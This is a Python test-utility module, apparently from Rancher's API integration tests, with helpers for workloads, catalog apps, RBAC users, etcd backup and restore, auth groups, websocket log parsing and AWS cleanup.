"type": "persistentVolumeClaimVolumeSource",
"persistentVolumeClaimId": pvc_name
}}]
volumeMounts = [{"readOnly": "False",
"type": "volumeMount",
"mountPath": mount_path,
"subPath": sub_path,
"name": "vol1"
}]
con = [{"name": "test1",
"image": TEST_IMAGE,
"volumeMounts": volumeMounts
}]
if is_daemonSet:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes,
daemonSetConfig={})
else:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes)
return workload
def write_content_to_file(pod, content, filename):
cmd_write = "/bin/bash -c 'echo {1} > {0}'".format(filename, content)
if is_windows():
        cmd_write = \
            'powershell -NoLogo -NonInteractive -Command ' \
            '"& {{ echo {1} > {0} }}"'.format(filename, content)
output = kubectl_pod_exec(pod, cmd_write)
assert output.strip().decode('utf-8') == ""
def validate_file_content(pod, content, filename):
cmd_get_content = "/bin/bash -c 'cat {0}' ".format(filename)
if is_windows():
        cmd_get_content = 'powershell -NoLogo -NonInteractive -Command ' \
                          '"& {{ cat {0} }}"'.format(filename)
output = kubectl_pod_exec(pod, cmd_get_content)
assert output.strip().decode('utf-8') == content
def wait_for_mcapp_to_active(client, multiClusterApp,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
time.sleep(5)
# When the app is deployed it goes into Active state for a short
# period of time and then into installing/deploying.
mcapps = client.list_multiClusterApp(uuid=multiClusterApp.uuid,
name=multiClusterApp.name).data
start = time.time()
assert len(mcapps) == 1, "Cannot find multi cluster app"
mapp = mcapps[0]
while mapp.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
multiclusterapps = client.list_multiClusterApp(
uuid=multiClusterApp.uuid, name=multiClusterApp.name).data
assert len(multiclusterapps) == 1
mapp = multiclusterapps[0]
return mapp
def wait_for_app_to_active(client, app_id,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
"""
    First wait for the app to reach the deploying state, then wait for it to
    get to the active state. This avoids wrongly concluding that the app is
    active, as the app goes through installing > active > deploying > active.
@param client: Project client
@param app_id: App id of deployed app.
@param timeout: Max time allowed to wait for app to become active.
@return: app object
"""
start = time.time()
app_data = client.list_app(id=app_id).data
while len(app_data) == 0:
if time.time() - start > timeout / 10:
raise AssertionError(
"Timed out waiting for listing the app from API")
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "deploying":
if time.time() - start > timeout / 3:
break
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for {0} to get to active,"
" the actual state: {1}".format(application.name,
application.state))
time.sleep(.5)
app = client.list_app(id=app_id).data
assert len(app) >= 1
application = app[0]
return application
def wait_for_app_to_remove(client, app_id,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
start = time.time()
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
return
application = app_data[0]
while application.state == "removing" or application.state == "active":
if time.time() - start > timeout / 10:
raise AssertionError(
"Timed out waiting for app to not be installed")
time.sleep(.2)
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
break
application = app_data[0]
def validate_response_app_endpoint(p_client, appId,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
ingress_list = p_client.list_ingress(namespaceId=appId).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
print(url)
start = time.time()
try:
while True:
r = requests.head(url)
print(r.status_code)
if r.status_code == 200:
return
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting response to be 200.")
time.sleep(.5)
except requests.ConnectionError:
print("failed to connect")
assert False, "failed to connect to the app"
def resolve_node_ip(node):
if hasattr(node, 'externalIpAddress'):
node_ip = node.externalIpAddress
else:
node_ip = node.ipAddress
return node_ip
def provision_nfs_server():
node = AmazonWebServices().create_node(random_test_name("nfs-server"))
node.wait_for_ssh_ready()
c_path = os.getcwd()
cmd_path = c_path + "/tests/v3_api/scripts/nfs-setup.sh"
command = open(cmd_path, 'r').read()
node.execute_command(command)
return node
def get_defaut_question_answers(client, externalId):
def get_answer(quest):
if "default" in quest.keys():
answer = quest["default"]
else:
answer = ""
            # If required and no default value is available, set a fake value
            # only for type string; for other types, error out
if "required" in quest.keys():
if quest["required"]:
if quest["type"] == "enum" and "options" in quest.keys():
answer = quest["options"][0]
elif quest["type"] == "password":
answer = "R@ncher135"
elif quest["type"] == "string":
answer = "fake"
else:
assert False, \
"Cannot set default for types {}" \
"".format(quest["type"])
return answer
def check_if_question_needed(questions_and_answers, ques):
add_question = False
match_string = ques["showIf"]
match_q_as = match_string.split("&&")
for q_a in match_q_as:
items = q_a.split("=")
if len(items) == 1:
items.append("")
if items[0] in questions_and_answers.keys():
if questions_and_answers[items[0]] == items[1]:
add_question = True
else:
add_question = False
break
return add_question
questions_and_answers = {}
print("external id = {}".format(externalId))
template_revs = client.list_template_version(externalId=externalId).data
assert len(template_revs) == 1
template_rev = template_revs[0]
questions = template_rev.questions
for ques in questions:
add_question = True
if "showIf" in ques.keys():
add_question = \
check_if_question_needed(questions_and_answers, ques)
if add_question:
question = ques["variable"]
answer = get_answer(ques)
            questions_and_answers[question] = answer
if "showSubquestionIf" in ques.keys():
if ques["showSubquestionIf"] == answer:
sub_questions = ques["subquestions"]
for sub_question in sub_questions:
question = sub_question["variable"]
questions_and_answers[question] = \
get_answer(sub_question)
print("questions_and_answers = {}".format(questions_and_answers))
return questions_and_answers
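# Illustrative sketch (not part of the original suite): the shape of the dict
# returned above for a hypothetical chart with a defaulted string question, a
# required enum question, and a required password question. The variable
# names and values below are made up purely for illustration.
def _example_default_answers_shape():
    return {
        "image.repository": "nginx",    # default taken from the question
        "service.type": "ClusterIP",    # first option of a required enum
        "adminPassword": "R@ncher135",  # filled in for required passwords
    }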
def validate_app_deletion(client, app_id,
timeout=DEFAULT_APP_DELETION_TIMEOUT):
app_data = client.list_app(id=app_id).data
start = time.time()
if len(app_data) == 0:
return
application = app_data[0]
while application.state == "removing":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for app to delete")
time.sleep(.5)
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
break
application = app_data[0]
def validate_catalog_app(proj_client, app, external_id, answer=None):
"""
    This method validates that all the deployed workloads are in active state,
    have the correct chart version, and that the answers match.
    @param proj_client: project client object of an existing project.
    @param app: deployed app object.
    @param external_id: catalog external ID of the app.
    @param answer: answers the app expects while deploying (body of the post call).
    @return: deployed app object.
"""
if answer is None:
answers = get_defaut_question_answers(get_user_client(), external_id)
else:
answers = answer
# validate app is active
app = wait_for_app_to_active(proj_client, app.id)
assert app.externalId == external_id, \
"the version of the app is not correct"
# check if associated workloads are active
ns = app.targetNamespace
parameters = external_id.split('&')
assert len(parameters) > 1, \
"Incorrect list of parameters from catalog external ID"
chart_prefix = parameters[len(parameters) - 2].split("=")[1]
chart_suffix = parameters[len(parameters) - 1].split("=")[1]
chart = chart_prefix + "-" + chart_suffix
app_name = parameters[len(parameters) - 2].split("=")[1]
workloads = proj_client.list_workload(namespaceId=ns).data
# For longhorn app, only active state of workloads is verified as longhorn
# workloads do not have the field workloadLabels
# For all other apps active state of workloads & chart version are verified
if "longhorn" in app.externalId:
print("validating the Longhorn app, it may take longer than others")
for wl in workloads:
wait_for_wl_to_active(proj_client, wl)
else:
for wl in workloads:
print("Workload {} , state - {}".format(wl.id, wl.state))
assert wl.state == "active"
chart_deployed = get_chart_info(wl.workloadLabels)
print("Chart detail of app - {}".format(chart_deployed))
# '-' check is to make sure chart has both app name and version.
if app_name in chart_deployed and '-' in chart_deployed:
assert chart_deployed == chart, "the chart version is wrong"
# Validate_app_answers
assert len(answers.items() - app["answers"].items()) == 0, \
"Answers are not same as the original catalog answers"
return app
def get_chart_info(workloadlabels):
"""
This method finds either 'chart' tag or
'helm.sh/chart' tag from workload API
@param workloadlabels: workloadslabel object
@return: chart value of workload e.g. 'app_name-version'
"""
if "chart" in workloadlabels.keys():
return workloadlabels.chart
elif "helm.sh/chart" in workloadlabels.keys():
return workloadlabels["helm.sh/chart"]
else:
return ''
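# Illustrative sketch (not part of the original suite): with Helm 3 style
# labels a plain dict is enough to exercise the "helm.sh/chart" branch above;
# the legacy "chart" branch relies on the API object's attribute access
# (workloadLabels.chart), so it is not reproduced with a dict here. The chart
# value is made up.
def _example_chart_label_lookup():
    helm3_labels = {"helm.sh/chart": "mysql-1.6.2"}
    assert get_chart_info(helm3_labels) == "mysql-1.6.2"
    assert get_chart_info({}) == ''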
def create_user(client, cattle_auth_url=CATTLE_AUTH_URL):
user_name = random_name()
user = client.create_user(username=user_name,
password=USER_PASSWORD)
client.create_global_role_binding(globalRoleId="user",
subjectKind="User",
userId=user.id)
user_token = get_user_token(user.username, USER_PASSWORD, cattle_auth_url)
return user, user_token
def get_user_token(username, password, cattle_auth_url=CATTLE_AUTH_URL):
r = requests.post(cattle_auth_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
print(r.json())
return r.json()["token"]
def rbac_get_user_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["user"]
return None
def rbac_get_user_token_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["token"]
return None
def rbac_get_kubeconfig_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["kubeconfig"]
return None
def rbac_get_project():
return rbac_data["project"]
def rbac_get_namespace():
return rbac_data["namespace"]
def rbac_get_workload():
return rbac_data["workload"]
def rbac_get_unshared_project():
return rbac_data["p_unshared"]
def rbac_get_unshared_ns():
return rbac_data["ns_unshared"]
def rbac_get_unshared_workload():
return rbac_data["wl_unshared"]
def rbac_prepare():
"""this function creates one project, one namespace,
and four users with different roles"""
admin_client, cluster = get_global_admin_client_and_cluster()
create_kubeconfig(cluster)
# create a new project in the cluster
project, ns = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-test-rbac"))
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
p_client = get_project_client_for_token(project, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, workload, "deployment", ns.name)
rbac_data["workload"] = workload
rbac_data["project"] = project
rbac_data["namespace"] = ns
# create new users
for key in rbac_data["users"]:
user1, token1 = create_user(admin_client)
rbac_data["users"][key]["user"] = user1
rbac_data["users"][key]["token"] = token1
# assign different role to each user
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_OWNER]["user"],
cluster,
CLUSTER_OWNER)
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_MEMBER]["user"],
cluster,
CLUSTER_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_MEMBER]["user"],
project,
PROJECT_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_OWNER]["user"],
project,
PROJECT_OWNER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_READ_ONLY]["user"],
project,
PROJECT_READ_ONLY)
# create kubeconfig files for each user
for key in rbac_data["users"]:
user_client = get_client_for_token(rbac_data["users"][key]["token"])
_, user_cluster = get_user_client_and_cluster(user_client)
rbac_data["users"][key]["kubeconfig"] = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
key + "_kubeconfig")
create_kubeconfig(user_cluster, rbac_data["users"][key]["kubeconfig"])
# create another project that none of the above users are assigned to
p2, ns2 = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-unshared"))
name = random_test_name("default")
p_client = get_project_client_for_token(p2, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns2.id)
validate_workload(p_client, workload, "deployment", ns2.name)
rbac_data["p_unshared"] = p2
rbac_data["ns_unshared"] = ns2
rbac_data["wl_unshared"] = workload
def rbac_cleanup():
""" remove the project, namespace and users created for the RBAC tests"""
try:
client = get_admin_client()
except Exception:
print("Not able to get admin client. Not performing RBAC cleanup")
return
for _, value in rbac_data["users"].items():
try:
client.delete(value["user"])
except Exception:
pass
client.delete(rbac_data["project"])
client.delete(rbac_data["wl_unshared"])
client.delete(rbac_data["p_unshared"])
def check_condition(condition_type, status):
def _find_condition(resource):
if not hasattr(resource, "conditions"):
return False
if resource.conditions is None:
return False
for condition in resource.conditions:
if condition.type == condition_type and condition.status == status:
return True
return False
return _find_condition
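# Illustrative sketch (not part of the original suite): check_condition() is a
# predicate factory, so it can be handed to wait_for_condition() the same way
# the inline lambdas are used elsewhere in this module. "Ready"/"True" is a
# hypothetical condition type/status pair used purely for illustration.
def _example_wait_for_ready_condition(client, cluster):
    return wait_for_condition(client, cluster,
                              check_condition("Ready", "True"),
                              lambda x: 'State is: ' + x.state)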
def create_catalog_external_id(catalog_name, template, version,
project_cluster_id=None, catalog_type=None):
if catalog_type is None:
return "catalog://?catalog=" + catalog_name + \
"&template=" + template + "&version=" + version
elif catalog_type == "project" or catalog_type == "cluster":
return "catalog://?catalog=" + project_cluster_id + "/" \
+ catalog_name + "&type=" + catalog_type \
+ "Catalog&template=" + template + "&version=" + version
def wait_for_catalog_active(client, catalog, timeout=DEFAULT_CATALOG_TIMEOUT):
time.sleep(2)
catalog_data = client.list_catalog(name=catalog.name)
print(catalog_data)
start = time.time()
assert len(catalog_data["data"]) >= 1, "Cannot find catalog"
catalog = catalog_data["data"][0]
while catalog.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
catalog_data = client.list_catalog(name=catalog.name)
assert len(catalog_data["data"]) >= 1
catalog = catalog_data["data"][0]
return catalog
def readDataFile(data_dir, name):
fname = os.path.join(data_dir, name)
print("File: " + fname)
is_file = os.path.isfile(fname)
assert is_file
with open(fname) as f:
return f.read()
def set_url_password_token(rancher_url, server_url=None):
"""Returns a ManagementContext for the default global admin user."""
auth_url = \
rancher_url + "/v3-public/localproviders/local?action=login"
r = requests.post(auth_url, json={
'username': 'admin',
'password': 'admin',
'responseType': 'json',
}, verify=False)
print(r.json())
token = r.json()['token']
print(token)
# Change admin password
client = rancher.Client(url=rancher_url + "/v3",
token=token, verify=False)
admin_user = client.list_user(username="admin").data
admin_user[0].setpassword(newPassword=ADMIN_PASSWORD)
# Set server-url settings
serverurl = client.list_setting(name="server-url").data
if server_url:
client.update(serverurl[0], value=server_url)
else:
client.update(serverurl[0], value=rancher_url)
return token
def validate_create_catalog(token, catalog_name, branch, url, permission=True):
"""
This function validates if the user has the permission to create a
global catalog.
:param token: user's token
:param catalog_name: the name of the catalog
:param branch: the branch of the git repo
:param url: the url of the git repo
:param permission: boolean value, True if the user can create catalog
:return: the catalog object or None
"""
client = get_client_for_token(token)
if not permission:
with pytest.raises(ApiError) as e:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
error_msg = "user with no permission should receive 403: Forbidden"
error_code = e.value.error.code
error_status = e.value.error.status
assert error_status == 403 and error_code == 'Forbidden', error_msg
return None
else:
try:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
except ApiError as e:
assert False, "user with permission should receive no exception:" \
+ str(e.error.status) + " " + e.error.code
catalog_list = client.list_catalog(name=catalog_name).data
assert len(catalog_list) == 1
return catalog_list[0]
def generate_template_global_role(name, new_user_default=False, template=None):
""" generate a template that is used for creating a global role"""
if template is None:
template = TEMPLATE_MANAGE_CATALOG
template = deepcopy(template)
if new_user_default:
template["newUserDefault"] = "true"
else:
template["newUserDefault"] = "false"
if name is None:
name = random_name()
template["name"] = name
return template
def wait_for_backup_to_active(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
while etcdbackupstate != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
print("BACKUP STATE")
print(etcdbackupstate)
return etcdbackupstate
def wait_for_backup_to_delete(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
while len(etcdbackups) == 1:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for backup to be deleted")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
def validate_backup_create(namespace, backup_info, backup_mode=None):
p_client = namespace["p_client"]
ns = namespace["ns"]
cluster = namespace["cluster"]
name = random_test_name("default")
if not hasattr(cluster, 'rancherKubernetesEngineConfig'):
assert False, "Cluster is not of type RKE"
con = [{"name": "test1",
"image": TEST_IMAGE}]
backup_info["workload"] = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, backup_info["workload"], "daemonSet", ns.name,
len(get_schedulable_nodes(cluster)))
host = "test" + str(random_int(10000, 99999)) + ".com"
namespace["host"] = host
path = "/name.html"
rule = {"host": host,
"paths": [{"workloadIds": [backup_info["workload"].id],
"targetPort": TEST_IMAGE_PORT}]}
p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Perform Backup
backup = cluster.backupEtcd()
backup_info["backupname"] = backup['metadata']['name']
wait_for_backup_to_active(cluster, backup_info["backupname"])
# Get all the backup info
etcdbackups = cluster.etcdBackups(name=backup_info["backupname"])
backup_info["etcdbackupdata"] = etcdbackups['data']
backup_info["backup_id"] = backup_info["etcdbackupdata"][0]['id']
if backup_mode == "s3":
backupfileurl = backup_info["etcdbackupdata"][0]['filename']
# Check the backup filename exists in S3
parseurl = urlparse(backupfileurl)
backup_info["backupfilename"] = os.path.basename(parseurl.path)
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
assert backup_found, "the backup was not found in the S3 bucket"
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
assert backup_info["etcdbackupdata"][0]['filename'] in response, \
"The filename doesn't match any of the files locally"
return namespace, backup_info
def validate_backup_restore(namespace, backup_info):
p_client = namespace["p_client"]
ns = namespace["ns"]
client = get_user_client()
cluster = namespace["cluster"]
name = random_test_name("default")
host = namespace["host"]
path = "/name.html"
con = [{"name": "test1",
"image": TEST_IMAGE}]
# Create workload after backup
testworkload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, testworkload, "deployment", ns.name)
# Perform Restore
cluster.restoreFromEtcdBackup(etcdBackupId=backup_info["backup_id"])
# After restore, validate cluster
validate_cluster(client, cluster, intermediate_state="updating",
check_intermediate_state=True,
skipIngresscheck=False)
# Verify the ingress created before taking the snapshot
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Verify the workload created after getting a snapshot does not exist
# after restore
workload_list = p_client.list_workload(uuid=testworkload.uuid).data
print(len(workload_list))
assert len(workload_list) == 0, "workload shouldn't exist after restore"
return namespace, backup_info
def validate_backup_delete(namespace, backup_info, backup_mode=None):
client = get_user_client()
cluster = namespace["cluster"]
client.delete(
cluster.etcdBackups(name=backup_info["backupname"])['data'][0]
)
wait_for_backup_to_delete(cluster, backup_info["backupname"])
assert len(cluster.etcdBackups(name=backup_info["backupname"])) == 0, \
"backup shouldn't be listed in the Cluster backups"
if backup_mode == "s3":
# Check the backup reference is deleted in Rancher and S3
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
assert_message = "The backup should't exist in the S3 bucket"
assert backup_found is False, assert_message
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
filename = backup_info["etcdbackupdata"][0]['filename']
assert filename not in response, \
"The file still exist in the filesystem"
def apply_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('apply -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def get_crd(ns, crd_name, kubectl_context):
return execute_kubectl_cmd('get ' + crd_name + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def delete_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('delete -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def prepare_auth_data():
name = \
os.path.join(os.path.dirname(os.path.realpath(__file__)) + "/resource",
AUTH_PROVIDER.lower() + ".json")
with open(name) as reader:
auth_data = reader.read()
raw = json.loads(auth_data).get("nested_group_info")
nested_group["auth_info"] = raw.copy()
nested_group["users"] = raw.get("users")
raw.pop("users")
nested_group["group_dic"] = raw
nested_group["groups"] = raw.keys()
def is_nested():
""" check if the provided groups are nested groups,
return True if at least one of the groups contains other groups
"""
    count = 0
    for group_name, group_info in nested_group["group_dic"].items():
        if len(group_info.get("groups")) == 0:
            count += 1
    if count < len(nested_group["group_dic"]):
        return True
    return False
def get_group(nested=False):
""" return a group or a nested group"""
if nested:
# return the name of a group that contains at least one other group
for item in nested_group["groups"]:
if len(nested_group["group_dic"].get(item).get("users")) == 0:
pass
sub_groups = nested_group["group_dic"].get(item).get("groups")
if len(sub_groups) == 0:
pass
for g in sub_groups:
if len(nested_group["group_dic"].get(g).get("users")) > 0:
return item
assert False, "cannot find any valid nested group"
else:
# return the name of a group that has at least one direct user
for group in nested_group["groups"]:
if len(nested_group["group_dic"].get(group).get("users")) > 0:
return group
assert False, "cannot find any valid non-nested group"
def get_user_by_group(group, nested=False):
""" return the list of uses in the group or nested group
if nested is False, return the direct users in the group;
otherwise, return all users including those from nested groups
"""
def get_user_in_nested_group(group, source):
if group == "":
return []
users = source["group_dic"].get(group).get("users")
for sub_group in source["group_dic"].get(group).get("groups"):
temp = get_user_in_nested_group(sub_group, source)
for user in temp:
if user not in users:
users.append(user)
return users
if nested:
users = get_user_in_nested_group(group, nested_group)
assert len(users) > 0, "no user in the group"
else:
users = nested_group["group_dic"].get(group).get("users")
assert users is not None, "no user in the group"
print("group: {}, users: {}".format(group, users))
return users
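# Illustrative sketch (not part of the original suite): a minimal, made-up
# group_dic mirroring the structure prepare_auth_data() builds, showing how
# nested resolution walks sub-groups and de-duplicates users. The walk below
# reproduces what the inner get_user_in_nested_group() does.
def _example_nested_group_resolution():
    group_dic = {
        "parent": {"users": ["alice"], "groups": ["child"]},
        "child": {"users": ["bob", "alice"], "groups": []},
    }
    users = group_dic["parent"]["users"][:]  # direct members: ["alice"]
    for sub in group_dic["parent"]["groups"]:
        for user in group_dic[sub]["users"]:
            if user not in users:
                users.append(user)
    return users  # -> ["alice", "bob"]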
def get_a_group_and_a_user_not_in_it(nested=False):
""" return a group or a nested group and a user that is not in the group"""
all_users = nested_group["users"]
for group in nested_group["groups"]:
group_users = get_user_by_group(group, nested)
for user in all_users:
if user not in group_users:
print("group: {}, user not in it: {}".format(group, user))
return group, user
assert False, "cannot find a group and a user not in it"
def get_group_principal_id(group_name, token=ADMIN_TOKEN, expected_status=200):
""" get the group's principal id from the auth provider"""
headers = {'Authorization': 'Bearer ' + token}
r = requests.post(CATTLE_AUTH_PRINCIPAL_URL,
json={'name': group_name,
'principalType': 'group',
'responseType': 'json'},
verify=False, headers=headers)
assert r.status_code == expected_status
return r.json()['data'][0]["id"]
def login_as_auth_user(username, password, login_url=LOGIN_AS_AUTH_USER_URL):
""" login with the user account from the auth provider,
    and return the login response json (which contains the token)"""
r = requests.post(login_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
assert r.status_code in [200, 201]
return r.json()
def validate_service_discovery(workload, scale,
p_client=None, ns=None, testclient_pods=None):
expected_ips = []
pods = p_client.list_pod(workloadId=workload["id"]).data
assert len(pods) == scale
for pod in pods:
expected_ips.append(pod["status"]["podIp"])
host = '{0}.{1}.svc.cluster.local'.format(workload.name, ns.id)
for pod in testclient_pods:
validate_dns_entry(pod, host, expected_ips)
def auth_get_project():
return auth_rbac_data["project"]
def auth_get_namespace():
return auth_rbac_data["namespace"]
def auth_get_user_token(username):
if username in auth_rbac_data["users"].keys():
return auth_rbac_data["users"][username].token
return None
def add_role_to_user(user, role):
"""this function adds a user from the auth provider to given cluster"""
admin_client, cluster = get_global_admin_client_and_cluster()
project = auth_get_project()
ns = auth_get_namespace()
if not (project and ns):
project, ns = create_project_and_ns(ADMIN_TOKEN, cluster,
random_test_name("p-test-auth"))
auth_rbac_data["project"] = project
auth_rbac_data["namespace"] = ns
if role in [PROJECT_OWNER, PROJECT_MEMBER, PROJECT_READ_ONLY]:
assign_members_to_project(admin_client, user, project, role)
else:
assign_members_to_cluster(admin_client, user, cluster, role)
auth_rbac_data["users"][user.username] = user
def auth_resource_cleanup():
""" remove the project and namespace created for the AUTH tests"""
client, cluster = get_global_admin_client_and_cluster()
client.delete(auth_rbac_data["project"])
auth_rbac_data["project"] = None
auth_rbac_data["ns"] = None
for username, user in auth_rbac_data["users"].items():
user_crtbs = client.list_cluster_role_template_binding(userId=user.id)
for crtb in user_crtbs:
client.delete(crtb)
class WebsocketLogParse:
"""
the class is used for receiving and parsing the message
received from the websocket
"""
def __init__(self):
self.lock = Lock()
self._last_message = ''
def receiver(self, socket, skip, b64=True):
"""
run a thread to receive and save the message from the web socket
:param socket: the socket connection
:param skip: if True skip the first char of the received message
"""
        while socket.connected:
try:
data = socket.recv()
# the message from the kubectl contains an extra char
if skip:
data = data[1:]
if len(data) < 5:
pass
if b64:
data = base64.b64decode(data).decode()
self.lock.acquire()
self._last_message += data
self.lock.release()
except websocket.WebSocketConnectionClosedException:
print("Connection closed")
break
except websocket.WebSocketProtocolException as wpe:
print("Error: {}".format(wpe))
break
@staticmethod
def start_thread(target, args):
thread = Thread(target=target, args=args)
thread.daemon = True
thread.start()
time.sleep(1)
@property
def last_message(self):
return self._last_message
@last_message.setter
def last_message(self, value):
self.lock.acquire()
self._last_message = value
self.lock.release()
def wait_for_cluster_delete(client, cluster_name, timeout=DEFAULT_TIMEOUT):
start = time.time()
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
while cluster_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for cluster to get deleted")
time.sleep(.5)
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
def create_connection(url, subprotocols):
"""
    create a websocket connection and check if it is connected
:param url: the url to connect to
:param subprotocols: the list of subprotocols
:return:
"""
ws = websocket.create_connection(
url=url,
sslopt={"cert_reqs": ssl.CERT_NONE},
subprotocols=subprotocols,
timeout=10,
cookie="R_SESS=" + USER_TOKEN
)
assert ws.connected, "failed to build the websocket"
return ws
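# Illustrative sketch (not part of the original suite): wiring
# create_connection() and WebsocketLogParse together the way the kubectl/log
# websocket checks do. The URL is a made-up placeholder; "base64.channel.k8s.io"
# and the leading status byte (skip=True) match the kubectl channel framing.
def _example_stream_websocket_output(ws_url):
    ws = create_connection(ws_url, ["base64.channel.k8s.io"])
    parser = WebsocketLogParse()
    WebsocketLogParse.start_thread(target=parser.receiver, args=(ws, True))
    time.sleep(3)  # give the receiver thread a moment to accumulate output
    output = parser.last_message
    ws.close()
    return output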
def wait_for_hpa_to_active(client, hpa, timeout=DEFAULT_TIMEOUT):
start = time.time()
hpalist = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpalist) == 1
hpa = hpalist[0]
while hpa.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
hpas = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpas) == 1
hpa = hpas[0]
return hpa
def create_pv_pvc(client, ns, nfs_ip, cluster_client):
pv_object = create_pv(cluster_client, nfs_ip)
pvc_name = random_test_name("pvc")
pvc_config = {"accessModes": ["ReadWriteOnce"],
"name": pvc_name,
"volumeId": pv_object.id,
"namespaceId": ns.id,
"storageClassId": "",
"resources": {"requests": {"storage": "10Gi"}}
}
pvc_object = client.create_persistent_volume_claim(pvc_config)
pvc_object = wait_for_pvc_to_be_bound(client, pvc_object, timeout=300)
return pv_object, pvc_object
def create_pv(client, nfs_ip):
pv_name = random_test_name("pv")
pv_config = {"type": "persistentVolume",
"accessModes": ["ReadWriteOnce"],
"name": pv_name,
"nfs": {"readOnly": "false",
"type": "nfsvolumesource",
"path": NFS_SERVER_MOUNT_PATH,
"server": nfs_ip
},
"capacity": {"storage": "50Gi"}
}
pv_object = client.create_persistent_volume(pv_config)
capacitydict = pv_object['capacity']
assert capacitydict['storage'] == '50Gi'
assert pv_object['type'] == 'persistentVolume'
return pv_object
def delete_resource_in_AWS_by_prefix(resource_prefix):
"""
:param resource_prefix: the prefix of resource name
:return: None
"""
# delete nodes of both local and custom clusters
node_filter = [{
'Name': 'tag:Name',
'Values': [resource_prefix + "-*"]
}]
nodes = AmazonWebServices().get_nodes(filters=node_filter)
if nodes is None:
print("deleting the following instances: None")
else:
print("deleting the following instances: {}"
.format([node.public_ip_address for node in nodes]))
AmazonWebServices().delete_nodes(nodes)
# delete load balancer and target groups
tg_list = []
lb_list = []
lb_names = [resource_prefix + '-nlb',
resource_prefix + '-k3s-nlb',
resource_prefix + '-internal-nlb']
for name in lb_names:
lb_arn = AmazonWebServices().get_lb(name)
if lb_arn is not None:
lb_list.append(lb_arn)
